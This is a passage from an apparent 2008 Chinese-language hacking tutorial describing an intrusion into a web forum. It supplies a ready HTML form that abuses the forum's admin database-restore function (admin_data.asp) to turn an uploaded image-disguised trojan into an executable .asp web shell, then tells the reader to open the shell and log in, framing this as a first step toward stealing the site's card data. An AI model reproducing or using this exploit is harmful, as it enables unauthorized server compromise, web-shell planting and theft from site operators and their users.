黑客与网管的30天较量
2008-10-27 13:30:38 来源:WEB开发网再次郁闷......
没办法,得向群求救。
通过一个朋友得知,原来这样也要以运用数据库的[还原功能],嘿嘿,心动了吧?怎么弄呢?我们继续:
在桌面新建一个wokao.htm,里面的代码是:
<form action="http://XXXX/bbs/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>上传后的图片地址:<input name="Dbpath" type="text" size="80" value="UploadFile/2004-12/20041120192715291.gif"></p>
<p>木马保存地址:<input name="backpath" type="text" size="80" value="shijiemori.asp"></p>
<p><input type="submit" value="提交"></p>
</form>
'代码结束
上面的<from action=" " 这里的地址填上对方论坛绝对地址/admin_data.aspadmin_data.asp?action=RestoreData&act=Restore,Dbpath文件本筐里填表上上传后的马马图片地址,比如我传的图片地址是UploadFile/2004-12/20041120192715291.gif, backpath 文本筐里填写你要保存的马马地址,比如shijiemori.asp。
然后要做的就是点提交了,要是你运气比偶还差的话,那。。。。 要不然你肯定可以成功,成功后提示,数据库还原成功。
哈哈,好了,成功就好,可以访问我的马马了,还想啥?哈!!!
打开
http://XXXX/UploadFile/shijiemori.asp //这是偶滴马马地址
点密码进去。啊嘎嘎.
这样就完成了入侵的第一步,下面直接要做的就是拿那个站的卡啦。
更多精彩
赞助商链接